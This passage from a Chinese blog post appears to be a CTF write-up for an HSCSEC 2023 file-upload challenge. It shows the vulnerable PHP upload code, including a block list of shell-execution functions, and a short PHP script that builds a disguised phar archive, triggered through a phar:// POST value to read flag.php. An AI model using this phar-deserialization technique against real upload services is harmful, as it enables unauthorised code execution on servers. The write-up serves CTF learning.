class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">meta</span> <span class="attr">http-equiv</span>=<span class="string">&quot;Content-Type&quot;</span> <span class="attr">content</span>=<span class="string">&quot;text/html; charset=utf-8&quot;</span> /&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>上传图片<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span>	</span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span> = <span class="string">&quot;text/javascript&quot;</span> <span class="attr">color</span> = <span class="string">&quot;0,0,255&quot;</span> <span class="attr">opacity</span> = <span class="string">&#x27;0.7&#x27;</span> <span class="attr">zIndex</span> = <span class="string">&quot;-2&quot;</span> <span class="attr">count</span> = <span class="string">&quot;99&quot;</span> <span class="attr">src</span> = <span class="string">&#x27;js/canvas-nest.min.js&#x27;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span> <span class="comment">&lt;!-- 动态背景 --&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">h2</span>&gt;</span>上传你手里最好的图片!<span class="tag">&lt;/<span class="name">h2</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">p</span> <span class="attr">id</span> = <span class="string">&quot;comment&quot;</span>&gt;</span>If it is excellent enough, you will get the flag!<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span><span class="tag">&lt;<span class="name">br</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">div</span> <span class="attr">class</span> = <span class="string">&quot;form1&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span> = <span class="string">&quot;upload.php&quot;</span> <span class="attr">method</span> = <span class="string">&quot;post&quot;</span> <span class="attr">accept-charset</span> = <span class="string">&quot;utf-8&quot;</span> <span class="attr">enctype</span> = <span class="string">&quot;multipart/form-data&quot;</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">label</span> <span class="attr">name</span> = <span class="string">&quot;title&quot;</span> <span class="attr">for</span> = <span class="string">&quot;file&quot;</span>&gt;</span>图片:   <span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span> = <span class="string">&quot;file&quot;</span> <span class="attr">name</span> = <span class="string">&quot;file&quot;</span> <span class="attr">id</span> = <span class="string">&quot;file&quot;</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span> = <span class="string">&quot;submit&quot;</span> <span class="attr">class</span> = <span class="string">&quot;button&quot;</span> <span class="attr">name</span> = <span class="string">&quot;submit&quot;</span> <span class="attr">value</span> = <span class="string">&quot;上传&quot;</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">div</span>&gt;</span></span><br><span class="line">	</span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php </span></span><br><span class="line"><span class="meta">	error_reporting(0);</span></span><br><span class="line"><span class="meta">	$dir = &#x27;upload/&#x27;.md5($_SERVER[&#x27;REMOTE_ADDR&#x27;]).&#x27;/&#x27;;</span></span><br><span class="line"><span class="meta">	if(!is_dir($dir)) &#123;</span></span><br><span class="line"><span class="meta">		if(!mkdir($dir, 0777, true)) &#123;</span></span><br><span class="line"><span class="meta">			echo error_get_last()[&#x27;message&#x27;];</span></span><br><span class="line"><span class="meta">			die(&#x27;Failed to make the directory&#x27;);</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">	&#125;</span></span><br><span class="line"><span class="meta">	chdir($dir);</span></span><br><span class="line"><span class="meta">	if(isset($_POST[&#x27;submit&#x27;])) &#123;</span></span><br><span class="line"><span class="meta">		$name = $_FILES[&#x27;file&#x27;][&#x27;name&#x27;];</span></span><br><span class="line"><span class="meta">		$tmp_name = $_FILES[&#x27;file&#x27;][&#x27;tmp_name&#x27;];</span></span><br><span class="line"><span class="meta">		$ans = exif_imagetype($tmp_name);</span></span><br><span class="line"><span class="meta">		if($_FILES[&#x27;file&#x27;][&#x27;size&#x27;] &gt;= 204800) &#123;</span></span><br><span class="line"><span class="meta">			die(&#x27;filesize too big.&#x27;);</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">		if(!$name) &#123;</span></span><br><span class="line"><span class="meta">			die(&#x27;filename can not be empty!&#x27;);</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">		if(preg_match(&#x27;/(htaccess)|(user)|(\.\.)|(00)|(#)/i&#x27;, $name) !== 0) &#123;</span></span><br><span class="line"><span class="meta">			die(&#x27;Hacker!&#x27;);</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">		if(($ans != IMAGETYPE_GIF) &amp;&amp; ($ans != IMAGETYPE_JPEG) &amp;&amp; ($ans != IMAGETYPE_PNG)) &#123;</span></span><br><span class="line"><span class="meta">			$type = $_FILES[&#x27;file&#x27;][&#x27;type&#x27;];</span></span><br><span class="line"><span class="meta">			if($type == &#x27;image/gif&#x27; or $type == &#x27;image/jpg&#x27; or $type == &#x27;image/png&#x27; or $type == &#x27;image/jpeg&#x27;) &#123;</span></span><br><span class="line"><span class="meta">				echo &quot;&lt;p align=\&quot;center\&quot;&gt;Don&#x27;t cheat me with Content-Type!&lt;/p&gt;&quot;;</span></span><br><span class="line"><span class="meta">			&#125;</span></span><br><span class="line"><span class="meta">			echo(&quot;&lt;p align=\&quot;center\&quot;&gt;You can&#x27;t upload this kind of file!&lt;/p&gt;&quot;);</span></span><br><span class="line"><span class="meta">			exit;</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">		$content = file_get_contents($tmp_name);</span></span><br><span class="line"><span class="meta">		if(preg_match(&#x27;/(scandir)|(end)|(implode)|(eval)|(system)|(passthru)|(exec)|(chroot)|(chgrp)|(chown)|(shell_exec)|(proc_open)|(proc_get_status)|(ini_alter)|(ini_set)|(ini_restore)|(dl)|(pfsockopen)|(symlink)|(popen)|(putenv)|(syslog)|(readlink)|(stream_socket_server)|(error_log)/i&#x27;, $content) !== 0) &#123;</span></span><br><span class="line"><span class="meta">			echo(&#x27;&lt;script&gt;alert(&quot;How dare you upload file with such dangerous function?&quot;)&lt;/script&gt;&#x27;);</span></span><br><span class="line"><span class="meta">			exit;</span></span><br><span class="line"><span class="meta">		&#125;		</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">		$extension = substr($name, strrpos($name, &quot;.&quot;) + 1);</span></span><br><span class="line"><span class="meta">		if(preg_match(&#x27;/(png)|(jpg)|(jpeg)|(phar)|(gif)|(txt)|(md)|(exe)/i&#x27;, $extension) === 0) &#123;</span></span><br><span class="line"><span class="meta">			die(&quot;&lt;p align=\&quot;center\&quot;&gt;You can&#x27;t upload this kind of file!&lt;/p&gt;&quot;);</span></span><br><span class="line"><span class="meta">		&#125; </span></span><br><span class="line"><span class="meta">		$upload_file = $name;</span></span><br><span class="line"><span class="meta">		move_uploaded_file($tmp_name, $upload_file);</span></span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">		if(file_exists($name)) &#123;</span></span><br><span class="line"><span class="meta">			echo &quot;&lt;p align=\&quot;center\&quot;&gt;Your file $name has been uploaded.&lt;br&gt;&lt;/p&gt;&quot;;</span></span><br><span class="line"><span class="meta">		&#125; else &#123;</span></span><br><span class="line"><span class="meta">			echo &#x27;&lt;script&gt;alert(&quot;上传失败&quot;)&lt;/script&gt;&#x27;;</span></span><br><span class="line"><span class="meta">		&#125;</span></span><br><span class="line"><span class="meta">		echo &quot;&lt;p align=\&quot;center\&quot;&gt;&lt;a href=\&quot;view.php\&quot; &gt;点我去看上传的文件&lt;/a&gt;&lt;/p&gt;&quot;;</span></span><br><span class="line"><span class="meta">		#header(&quot;refresh:3;url=index.php&quot;);</span></span><br><span class="line"><span class="meta">	&#125;</span></span><br><span class="line"><span class="meta"> ?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">View</span></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$dir</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$cmd</span> = <span class="string">&#x27;show_source(&quot;flag.php&quot;);&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$phar</span> = <span class="keyword">new</span> <span class="title class_">Phar</span>(<span class="string">&#x27;phar.phar&#x27;</span>);</span><br><span class="line"><span class="variable">$phar</span> -&gt; <span class="title function_ invoke__">startBuffering</span>();</span><br><span class="line"><span class="variable">$phar</span> -&gt; <span class="title function_ invoke__">setStub</span>(<span class="string">&#x27;GIF89a&#x27;</span>.<span class="string">&#x27;&lt;?php __HALT_COMPILER();?&gt;&#x27;</span>);  </span><br><span class="line"><span class="variable">$phar</span> -&gt; <span class="title function_ invoke__">addFromString</span>(<span class="string">&#x27;test.txt&#x27;</span>,<span class="string">&#x27;test&#x27;</span>); </span><br><span class="line"><span class="variable">$object</span> = <span class="keyword">new</span> <span class="title class_">View</span>();  </span><br><span class="line"><span class="variable">$phar</span> -&gt; <span class="title function_ invoke__">setMetadata</span>(<span class="variable">$object</span>);</span><br><span class="line"><span class="variable">$phar</span> -&gt; <span class="title function_ invoke__">stopBuffering</span>();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然后本地运行得到phar.phar</p>
<p>然后post方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">delete=phar://aaa.phar</span><br></pre></td></tr></table></figure>

<p>触发file_exists</p>
 
      <!-- reward -->
      
      <div id="reword-out">
        <div id="reward-btn">
          打赏
        </div>
      </div>
      
    </div>
    

    <!-- copyright -->
    
    <div class="declare">
      <ul class="post-copyright">
        <li>
          <i class="ri-copyright-line"></i>
          <strong>版权声明： </strong>
          
          本博客所有文章除特别声明外，著作权归作者所有。转载请注明出处！
          
        </li>
      </ul>
    </div>
    
    <footer class="article-footer">
       
<div class="share-btn">
      <span class="share-sns share-outer">
        <i class="ri-share-forward-line"></i>
        分享
      </span>
      <div class="share-wrap">
        <i class="arrow"></i>
        <div class="share-icons">
          
          <a class="weibo share-sns" href="javascript:;" data-type="weibo">
            <i class="ri-weibo-fill"></i>
          </a>
          <a class="weixin share-sns wxFab" href="javascript:;" data-type="weixin">
            <i class="ri-wechat-fill"></i>
          </a>
          <a class="qq share-sns" href="javascript:;" data-type="qq">
            <i class="ri-qq-fill"></i>
          </a>
          <a class="douban share-sns" href="javascript:;" data-type="douban">
            <i class="ri-douban-line"></i>
          </a>
          <!-- <a class="qzone share-sns" href="javascript:;" data-type="qzone">
            <i class="icon icon-qzone"></i>
          </a> -->
          
          <a class="facebook share-sns" href="javascript:;" data-type="facebook">
            <i class="ri-facebook-circle-fill"></i>
          </a>
          <a class="twitter share-sns" href="javascript:;" data-type="twitter">
            <i class="ri-twitter-fill"></i>
          </a>
          <a class="google share-sns" href="javascript:;" data-type="google">
            <i class="ri-google-fill"></i>
          </a>
        </div>
      </div>
</div>

<div class="wx-share-modal">
    <a class="modal-close" href="javascript:;"><i class="ri-close-circle-line"></i></a>
    <p>扫一扫，分享到微信</p>
    <div class="wx-qrcode">
      <img src="//api.qrserver.com/v1/create-qr-code/?size=150x150&data=http://example.com/2023/02/13/HSCSEC-%E7%BA%A2%E5%AE%A2%E7%AA%81%E5%87%BB%E9%98%9F-2023/" alt="微信分享二维码">
    </div>
</div>

<div id="share-mask"></div>  
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/HSCSEC/" rel="tag">HSCSEC</a></li></ul>

    </footer>
  </div>

   
  <nav class="article-nav">
    
      <a href="/2023/03/06/2023%E9%BB%84%E6%B2%B3%E6%B5%81%E5%9F%9F%E5%85%AC%E5%AE%89%E7%BD%91%E7%BB%9C%E6%8A%80%E8%83%BD%E6%8C%91%E6%88%98%E8%B5%9B/" class="article-nav-link">
        <strong class="article-nav-caption">上一篇</strong>
        <div class="article-nav-title">
          
            2023黄河流域公安网络技能挑战赛
          
        </div>
      </a>
    
    
      <a href="/2023/02/02/%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5/" class="article-nav-link">
        <strong class="article-nav-caption">下一篇</strong>
        <div class="article-nav-title">报错注入</div>
      </a>
    
  </nav>

  
   
  
   
    <script src="https://cdn.staticfile.org/twikoo/1.4.18/twikoo.all.min.js"></script>
    <div id="twikoo" class="twikoo"></div>
    <script>
        twikoo.init({
            envId: ""
        })
    </script>
 
</article>

</section>
      <footer class="footer">
  <div class="outer">
    <ul>
      <li>
        Copyrights &copy;
        2023
        <i class="ri-heart-fill heart_icon"></i> f14g
      </li>
    </ul>
    <ul>
      <li>
        
      </li>
    </ul>
    <ul>
      <li>
        
        
        <span>
  <span><i class="ri-user-3-fill"></i>访问人数:<span id="busuanzi_value_site_uv"></span></span>
  <span class="division">|</span>
  <span><i class="ri-eye-fill"></i>浏览次数:<span id="busuanzi_value_page_pv"></span></span>
</span>
        
      </li>
    </ul>
    <ul>
      
    </ul>
    <ul>
      
    </ul>
    <ul>
      <li>
        <!-- cnzz统计 -->
        
        <script type="text/javascript" src='https://s9.cnzz.com/z_stat.php?id=1278069914&amp;web_id=1278069914'></script>
        
      </li>
    </ul>
  </div>
</footer>    
    </main>
    <div class="float_btns">
      <div class="totop" id="totop">
  <i class="ri-arrow-up-line"></i>
</div>

<div class="todark" id="todark">
  <i class="ri-moon-line"></i>
</div>

    </div>
    <aside class="sidebar on">
      <button class="navbar-toggle"></button>
<nav class="navbar">
  
  <div class="logo">
    <a href="/"><img src="/favicon.ico" alt="CTF"></a>
  </div>
  
  <ul class="nav nav-main">
    
    <li class="nav-item">
      <a class="nav-item-link" href="/">主页</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/archives">归档</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/categories">分类</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/tags">标签</a>
    </li>
    
    <li class="nav-item">
      <a class="nav-item-link" href="/me">关于我</a>
    </li>
    
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      
      <a class="nav-item-link nav-item-search"  title="搜索">
        <i class="ri-search-line"></i>
      </a>
      
      
      <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
        <i class="ri-rss-line"></i>
      </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
    </aside>
    <div id="mask"></div>

<!-- #reward -->
<div id="reward">
  <span class="close"><i class="ri-close-line"></i></span>
  <p class="reward-p"><i class="ri-cup-line"></i>请我喝杯咖啡吧~</p>
  <div class="reward-box">
    
    
    <div class="reward-item">
      <img class="reward-img" src="/images/wechat.jpg">
      <span class="reward-type">微信</span>
    </div>
    
  </div>
</div>
    
<script src="/js/jquery-3.6.0.min.js"></script>
 
<script src="/js/lazyload.min.js"></script>

<!-- Tocbot -->
 
<script src="/js/tocbot.min.js"></script>

<script>
  tocbot.init({
    tocSelector: ".tocbot",
    contentSelector: ".article-entry",
    headingSelector: "h1, h2, h3, h4, h5, h6",
    hasInnerContainers: true,
    scrollSmooth: true,
    scrollContainer: "main",
    positionFixedSelector: ".tocbot",
    positionFixedClass: "is-position-fixed",
    fixedSidebarOffset: "auto",
  });
</script>

<script src="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.js"></script>
<link
  rel="stylesheet"
  href="https://cdn.staticfile.org/jquery-modal/0.9.2/jquery.modal.min.css"
/>
<script src="https://cdn.staticfile.org/justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js"></script>

<script src="/dist/main.js"></script>

<!-- ImageViewer -->
 <!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>

    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">

        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                <!--  Controls are self-explanatory. Order can be changed. -->

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" style="display:none" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div>

<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/photoswipe/4.1.3/default-skin/default-skin.min.css">
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe.min.js"></script>
<script src="https://cdn.staticfile.org/photoswipe/4.1.3/photoswipe-ui-default.min.js"></script>

<script>
    function viewer_init() {
        let pswpElement = document.querySelectorAll('.pswp')[0];
        let $imgArr = document.querySelectorAll(('.article-entry img:not(.reward-img)'))

        $imgArr.forEach(($em, i) => {
            $em.onclick = () => {
                // slider展开状态
                // todo: 这样不好，后面改成状态
                if (document.querySelector('.left-col.show')) return
                let items = []
                $imgArr.forEach(($em2, i2) => {
                    let img = $em2.getAttribute('data-idx', i2)
                    let src = $em2.getAttribute('data-target') || $em2.getAttribute('src')
                    let title = $em2.getAttribute('alt')
                    // 获得原图尺寸
                    const image = new Image()
                    image.src = src
                    items.push({
                        src: src,
                        w: image.width || $em2.width,
                        h: image.height || $em2.height,
                        title: title
                    })
                })
                var gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, {
                    index: parseInt(i)
                });
                gallery.init()
            }
        })
    }
    viewer_init()
</script> 
<!-- MathJax -->
 <script type="text/x-mathjax-config">
  MathJax.Hub.Config({
      tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
  });

  MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for(i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
      }
  });
</script>

<script src="https://cdn.staticfile.org/mathjax/2.7.7/MathJax.js"></script>
<script src="https://cdn.staticfile.org/mathjax/2.7.7/config/TeX-AMS-MML_HTMLorMML-full.js"></script>
<script>
  var ayerConfig = {
    mathjax: true,
  };
</script>

<!-- Katex -->

<!-- busuanzi  -->
 
<script src="/js/busuanzi-2.3.pure.min.js"></script>
 
<!-- ClickLove -->

<!-- ClickBoom1 -->

<!-- ClickBoom2 -->
 
<script src="/js/clickBoom2.js"></script>
 
<!-- CodeCopy -->
 
<link rel="stylesheet" href="/css/clipboard.css">
 <script src="https://cdn.staticfile.org/clipboard.js/2.0.10/clipboard.min.js"></script>
<script>
  function wait(callback, seconds) {
    var timelag = null;
    timelag = window.setTimeout(callback, seconds);
  }
  !function (e, t, a) {
    var initCopyCode = function(){
      var copyHtml = '';
      copyHtml += '<button class="btn-copy" data-clipboard-snippet="">';
      copyHtml += '<i class="ri-file-copy-2-line"></i><span>COPY</span>';
      copyHtml += '</button>';
      $(".highlight .code pre").before(copyHtml);
      $(".article pre code").before(copyHtml);
      var clipboard = new ClipboardJS('.btn-copy', {
        target: function(trigger) {
          return trigger.nextElementSibling;
        }
      });
      clipboard.on('success', function(e) {
        let $btn = $(e.trigger);
        $btn.addClass('copied');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-checkbox-circle-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPIED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-checkbox-circle-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
      clipboard.on('error', function(e) {
        e.clearSelection();
        let $btn = $(e.trigger);
        $btn.addClass('copy-failed');
        let $icon = $($btn.find('i'));
        $icon.removeClass('ri-file-copy-2-line');
        $icon.addClass('ri-time-line');
        let $span = $($btn.find('span'));
        $span[0].innerText = 'COPY FAILED';
        
        wait(function () { // 等待两秒钟后恢复
          $icon.removeClass('ri-time-line');
          $icon.addClass('ri-file-copy-2-line');
          $span[0].innerText = 'COPY';
        }, 2000);
      });
    }
    initCopyCode();
  }(window, document);
</script>
 
<!-- CanvasBackground -->

<script>
  if (window.mermaid) {
    mermaid.initialize({ theme: "forest" });
  }
</script>


    
    

  </div>
</body>

</html>